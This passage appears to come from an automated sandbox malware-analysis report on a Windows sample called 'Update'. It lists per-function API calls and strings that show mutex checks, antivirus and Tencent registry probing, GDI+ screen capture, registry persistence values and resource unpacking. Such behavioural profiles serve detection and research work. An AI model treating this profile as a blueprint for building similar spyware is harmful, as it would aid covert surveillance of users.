                                                                                            • Instruction Fuzzy Hash: 0181B5B1A00228AFDB20DB50DC44FAFB7B8EB44705F0445C9F718AB252D675AE45CF68

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.12.27), ref: 034E5F66
                                                                                            • GetLastError.KERNEL32 ref: 034E5F6E
                                                                                            • Sleep.KERNEL32(000003E8), ref: 034E5F85
                                                                                            • CreateMutexW.KERNEL32(00000000,00000000,2024.12.27), ref: 034E5F90
                                                                                            • GetLastError.KERNEL32 ref: 034E5F92
                                                                                            • _memset.LIBCMT ref: 034E5FB9
                                                                                            • lstrlenW.KERNEL32(?), ref: 034E5FC6
                                                                                            • lstrcmpW.KERNEL32(?,03505328), ref: 034E5FED
                                                                                            • Sleep.KERNEL32(000003E8), ref: 034E5FF8
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 034E6005
                                                                                            • GetConsoleWindow.KERNEL32 ref: 034E600F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                            • String ID: 2024.12.27$key$open
                                                                                            • API String ID: 2922109467-156330446
                                                                                            • Opcode ID: 7bbf515200b4a8936f41da4251072f78e4f03f13fe5df146b6b8a1d149724fd3
                                                                                            • Instruction ID: ac1edd3bea5ab24855bcc466ff897fe02fe4b3c5e923f3187b6ffbeb72b59d23
                                                                                            • Opcode Fuzzy Hash: 7bbf515200b4a8936f41da4251072f78e4f03f13fe5df146b6b8a1d149724fd3
                                                                                            • Instruction Fuzzy Hash: DE210C725043059FD614EBB0EC45F5E7398AB94709F140C1AE6049B1D5DB71E50DCBA7

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 6C388CD2
                                                                                            • SHGetFolderPathA.SHELL32 ref: 6C388CEF
                                                                                            • _strlen.LIBCMT ref: 6C388D13
                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 6C389092
                                                                                            • CoInitialize.OLE32(00000000), ref: 6C3890A3
                                                                                            • CoCreateInstance.OLE32(6C3AF3C0,00000000,00000001,6C3AEC50,?), ref: 6C3890BB
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6C3890EA
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6C389139
                                                                                            • CoUninitialize.COMBASE ref: 6C38915D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesByteCharFileMultiWide$CreateFolderInitializeInstancePathUninitialize_strlen
                                                                                            • String ID: \$e\$n7;l
                                                                                            • API String ID: 1074249417-465262852
                                                                                            • Opcode ID: 0a96cc9db23ae2891380c1dd5e5f1498917bea51a5d2ab74a7e27763ed7f6cf7
                                                                                            • Instruction ID: c1366e3617691413af2cc68c8d13c996cdcedd12d332fe9dbd317e1923b7b160
                                                                                            • Opcode Fuzzy Hash: 0a96cc9db23ae2891380c1dd5e5f1498917bea51a5d2ab74a7e27763ed7f6cf7
                                                                                            • Instruction Fuzzy Hash: 833211B1D052188FEB24CF24CC887EEBBB5FF45304F144699E459AB690DB359A84CF92

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E62CE
                                                                                            • wsprintfW.USER32 ref: 034E6336
                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 034E635F
                                                                                            • _memset.LIBCMT ref: 034E6376
                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 034E63B2
                                                                                            • lstrcatW.KERNEL32(03511F10,?), ref: 034E63CE
                                                                                            • lstrcatW.KERNEL32(03511F10,0350535C), ref: 034E63DA
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 034E63E3
                                                                                            • lstrlenW.KERNEL32(03511F10,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E6427
                                                                                            • lstrcatW.KERNEL32(03511F10,035053D4,?,DF800B7B,00000AD4,00000000,75BF73E0), ref: 034E643B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                            • API String ID: 1671694837-1583895642
                                                                                            • Opcode ID: 5a999b38c185cdb10361d57cefcd23e70090f002862fa14a6637ad63da83836b
                                                                                            • Instruction ID: a8f66dfa65cdab9965a66e0dfc3f9c82cdba24433fd2f7bc7423c43fe2ad4c0e
                                                                                            • Opcode Fuzzy Hash: 5a999b38c185cdb10361d57cefcd23e70090f002862fa14a6637ad63da83836b
                                                                                            • Instruction Fuzzy Hash: E741A2F1A002686EDB24DB50CC54FEEB7B8AB48705F0445C9F309AB191D675AB85CF68
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,034E5611,0000035E,000002FA), ref: 034E749C
                                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 034E74B2
                                                                                            • swprintf.LIBCMT ref: 034E74EF
                                                                                              • Part of subcall function 034E7410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,034E7523), ref: 034E743D
                                                                                              • Part of subcall function 034E7410: GetProcAddress.KERNEL32(00000000), ref: 034E7444
                                                                                              • Part of subcall function 034E7410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,034E7523), ref: 034E7452
                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 034E7547
                                                                                            • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 034E7563
                                                                                            • RegCloseKey.KERNEL32(000002FA), ref: 034E7586
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,034E5611,0000035E,000002FA), ref: 034E7598
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                            • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                            • API String ID: 2158625971-3190923360
                                                                                            • Opcode ID: 862bb9b30c3b0a1ffd914887966283344c2e4aa5b2b4ce40ce50b7f9ab5777f0
                                                                                            • Instruction ID: a83de14aa000f9fd35938226b6fd543417b0a25151d61e80ef63c195fb64df65
                                                                                            • Opcode Fuzzy Hash: 862bb9b30c3b0a1ffd914887966283344c2e4aa5b2b4ce40ce50b7f9ab5777f0
                                                                                            • Instruction Fuzzy Hash: DB31E876A003087FDB14EBA4DD45FBF7B7CEF48710F140919BA15AA285E671DA04CB60
                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000002,?,DF800B7B,?,00000000,?), ref: 034EC09E
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 034EC0AA
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 034EC0BF
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 034EC0D5
                                                                                            • EnterCriticalSection.KERNEL32(0350FB64), ref: 034EC113
                                                                                            • LeaveCriticalSection.KERNEL32(0350FB64), ref: 034EC124
                                                                                              • Part of subcall function 034E9DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 034E9E04
                                                                                              • Part of subcall function 034E9DE0: GdipDisposeImage.GDIPLUS(?), ref: 034E9E18
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 034EC14C
                                                                                              • Part of subcall function 034EA460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 034EA48D
                                                                                              • Part of subcall function 034EA460: _free.LIBCMT ref: 034EA503
                                                                                            • GetHGlobalFromStream.OLE32(?,?), ref: 034EC16D
                                                                                            • GlobalLock.KERNEL32(?), ref: 034EC177
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 034EC18F
                                                                                              • Part of subcall function 034E9BA0: DeleteObject.GDI32(?), ref: 034E9BD2
                                                                                              • Part of subcall function 034E9BA0: EnterCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9BE3
                                                                                              • Part of subcall function 034E9BA0: EnterCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9BF8
                                                                                              • Part of subcall function 034E9BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,034E9B7B), ref: 034E9C04
                                                                                              • Part of subcall function 034E9BA0: LeaveCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9C15
                                                                                              • Part of subcall function 034E9BA0: LeaveCriticalSection.KERNEL32(0350FB64,?,?,?,034E9B7B), ref: 034E9C1C
                                                                                            • GlobalSize.KERNEL32(00000000), ref: 034EC1A5
                                                                                            • GlobalUnlock.KERNEL32(?), ref: 034EC221
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 034EC249
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                            • String ID:
                                                                                            • API String ID: 1483550337-0
                                                                                            • Opcode ID: a173463365f10bb8d6dfc740372fd2de755135b70180c2d5b686acfbd8791c5b
                                                                                            • Instruction ID: 3d8ce73adcf526b6bd082783e164fe1633b5ff8d317434b447755cd2e1d0700c
                                                                                            • Opcode Fuzzy Hash: a173463365f10bb8d6dfc740372fd2de755135b70180c2d5b686acfbd8791c5b
                                                                                            • Instruction Fuzzy Hash: A56148B5D00218AFCB10EFE9D888D9EBBB8FF48304F14852EE515AB251DB359906CF94
                                                                                            APIs
                                                                                              • Part of subcall function 6C3893E0: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C38941E
                                                                                              • Part of subcall function 6C3893E0: _strlen.LIBCMT ref: 6C38943A
                                                                                            • _strlen.LIBCMT ref: 6C389B62
                                                                                            • _strlen.LIBCMT ref: 6C389CD0
                                                                                            • CreateThread.KERNEL32(00000000,00000000,6C388770,6C3BC338,00000000,00000000), ref: 6C389E21
                                                                                            • CreateThread.KERNEL32(00000000,00000000,6C3880E0,00000000,00000000,00000000), ref: 6C389E36
                                                                                            • WaitForSingleObject.KERNEL32(00000000,00011170), ref: 6C389E48
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C389E56
                                                                                            • CreateThread.KERNEL32(00000000,00000000,6C382090,00000000,00000000,00000000), ref: 6C389F65
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateThread_strlen$CloseFileHandleModuleNameObjectSingleWait
                                                                                            • String ID: IiViS$Update.d$Update.d$dll
                                                                                            • API String ID: 632893256-1826472805
                                                                                            • Opcode ID: de2f57e28e0b1f6fc2aa454a6a0aa6e001f00798de6f9d6323e264c8cc1e4533
                                                                                            • Instruction ID: bf09b5295d3a19d1ca3136e81bc79b1916f86511bf10acfeead8d9b0960a1c1b
                                                                                            • Opcode Fuzzy Hash: de2f57e28e0b1f6fc2aa454a6a0aa6e001f00798de6f9d6323e264c8cc1e4533
                                                                                            • Instruction Fuzzy Hash: 8BD116B2D013049FDB14DFA4DC44BEEBBB5AF45304F144528E456A7B80E779AA48CFA2
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E64C2
                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 034E64E2
                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 034E6524
                                                                                            • _memset.LIBCMT ref: 034E6560
                                                                                            • _memset.LIBCMT ref: 034E658E
                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 034E65BA
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 034E65C3
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 034E65D5
                                                                                            • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 034E6625
                                                                                            • lstrlenW.KERNEL32(?), ref: 034E6635
                                                                                            Strings
                                                                                            • Software\Tencent\Plugin\VAS, xrefs: 034E64D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                            • String ID: Software\Tencent\Plugin\VAS
                                                                                            • API String ID: 2921034913-3343197220
                                                                                            • Opcode ID: 22bc96cdf68d7b15fd2b1843d8177ad98a1f19b15a5930321bad70b2053754aa
                                                                                            • Instruction ID: 51a399aba149dea667c1e3515c6e833d2e972ffac00652dbafcdebc34f2758cb
                                                                                            • Opcode Fuzzy Hash: 22bc96cdf68d7b15fd2b1843d8177ad98a1f19b15a5930321bad70b2053754aa
                                                                                            • Instruction Fuzzy Hash: DA41CAF5A40318AFD724DB60CD85FEA737CEB44700F0045DAE709BB185EA75AA858F58
                                                                                            APIs
                                                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 034EA48D
                                                                                            • _malloc.LIBCMT ref: 034EA4D1
                                                                                            • _free.LIBCMT ref: 034EA503
                                                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 034EA522
                                                                                            • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 034EA594
                                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 034EA59F
                                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 034EA5C5
                                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 034EA5DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                            • String ID: &
                                                                                            • API String ID: 2794124522-3042966939
                                                                                            • Opcode ID: 759e532e51bf44f15a6af7288bf800a1677601480616ec1f111977c1dd9fd5f3
                                                                                            • Instruction ID: 0046aea2469512a88e0260d6216f045059276282c4d91740918859b2bf067f72
                                                                                            • Opcode Fuzzy Hash: 759e532e51bf44f15a6af7288bf800a1677601480616ec1f111977c1dd9fd5f3
                                                                                            • Instruction Fuzzy Hash: A35175B6E002159FDB04DFA4C844EEFB7B8EF48305F14855AE915AF350D734A906CBA5
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                                            • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                            • String ID: IpDates_info$SOFTWARE
                                                                                            • API String ID: 864241144-2243437601
                                                                                            • Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                            • Instruction ID: c351098f3a10662c2abe80f3babca39824d4604c0415f8e3891e9891bb32f169
                                                                                            • Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                            • Instruction Fuzzy Hash: 184146316442819FF310CF308C45F6B7BB5FB453C6F994068E581CA186D3B2EA42C7A2
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                                            • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                            • String ID: IpDates_info$SOFTWARE
                                                                                            • API String ID: 864241144-2243437601
                                                                                            • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                            • Instruction ID: f7f7705b5b84b7b191dcdb77494346d14e222b8940c5b100b936b40375e1b217
                                                                                            • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                            • Instruction Fuzzy Hash: B731C1306443819FF315CF308848B6B7BF6FB493C6F9944A8F5859A146D3B2DA46C761
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C389F53,Update.d), ref: 6C388017
                                                                                            • FindResourceW.KERNEL32(00000000,004F0043), ref: 6C388066
                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 6C388074
                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 6C38807E
                                                                                            • LockResource.KERNEL32(00000000), ref: 6C388087
                                                                                              • Part of subcall function 6C386B10: _strlen.LIBCMT ref: 6C386B9F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeof_strlen
                                                                                            • String ID: C$I$N$T
                                                                                            • API String ID: 415223560-3924500842
                                                                                            • Opcode ID: 8cb2871e6edb7624fb63f0cf0a1682484b477d8d73825d661b85c0f35083d236
                                                                                            • Instruction ID: 79a28fdfe00f75f8ede32d8ba186a3dc1d600c2924b095759980f586099a124e
                                                                                            • Opcode Fuzzy Hash: 8cb2871e6edb7624fb63f0cf0a1682484b477d8d73825d661b85c0f35083d236
                                                                                            • Instruction Fuzzy Hash: 881199B1B053406BD7009B349D49A7B77ECEF9A208F001919F88996241EB79D954CB67
                                                                                            APIs
                                                                                              • Part of subcall function 6C3A9FEC: CreateFileW.KERNEL32(FFFFFFFF,00000000,?,6C3A9C90,?,?,00000000,?,6C3A9C90,FFFFFFFF,0000000C), ref: 6C3AA009
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3A9CFB
                                                                                            • __dosmaperr.LIBCMT ref: 6C3A9D02
                                                                                            • GetFileType.KERNEL32(00000000), ref: 6C3A9D0E
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3A9D18
                                                                                            • __dosmaperr.LIBCMT ref: 6C3A9D21
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C3A9D41
                                                                                            • CloseHandle.KERNEL32(6C3A07FB), ref: 6C3A9E8E
                                                                                            • GetLastError.KERNEL32 ref: 6C3A9EC0
                                                                                            • __dosmaperr.LIBCMT ref: 6C3A9EC7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                            • String ID:
                                                                                            • API String ID: 4237864984-0
                                                                                            • Opcode ID: 24de2dfb6c01d0578d3a86fd32f80aa0e6861ffb7f6be4c095db6e8fd1e3e09b
                                                                                            • Instruction ID: 72f8de6e1e7f579a2015e22b6ff868eba6ddfef50277ecbf342d212e97052d31
                                                                                            • Opcode Fuzzy Hash: 24de2dfb6c01d0578d3a86fd32f80aa0e6861ffb7f6be4c095db6e8fd1e3e09b
                                                                                            • Instruction Fuzzy Hash: F1A13632A146549FCF099FA8DC91BAD3BB4EB07318F14014AE812EB391D7368967CF52
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$.$jIk
                                                                                            • API String ID: 4218353326-3923260969
                                                                                            • Opcode ID: 5d157fde0ce29065a6c8901906fe19fe088195657ec5c8275ab1b4f4023d2594
                                                                                            • Instruction ID: 9be96c19f562d1cd4bbb97640ab1a1b83646dcd5824c42ab0cded7360f42ce5b
                                                                                            • Opcode Fuzzy Hash: 5d157fde0ce29065a6c8901906fe19fe088195657ec5c8275ab1b4f4023d2594
                                                                                            • Instruction Fuzzy Hash: 2B82BD71D122688BEB24CF64C8947EDBBB2BF45304F158298D449ABB81DB755EC8CF81
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,035012F8,DF800B7B,00000001,00000000,00000000), ref: 034ECAB1
                                                                                            • RegQueryInfoKeyW.ADVAPI32(035012F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 034ECAE0
                                                                                            • _memset.LIBCMT ref: 034ECB44
                                                                                            • _memset.LIBCMT ref: 034ECB53
                                                                                            • RegEnumValueW.KERNEL32(035012F8,?,00000000,?,00000000,?,00000000,?), ref: 034ECB72
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                              • Part of subcall function 034EF707: std::exception::exception.LIBCMT ref: 034EF756
                                                                                              • Part of subcall function 034EF707: std::exception::exception.LIBCMT ref: 034EF770
                                                                                              • Part of subcall function 034EF707: __CxxThrowException@8.LIBCMT ref: 034EF781
                                                                                            • RegCloseKey.KERNEL32(035012F8,?,?,?,?,?,?,?,?,?,?,?,00000000,035012F8,000000FF), ref: 034ECC83
                                                                                            Strings
                                                                                            Memory Dump Source
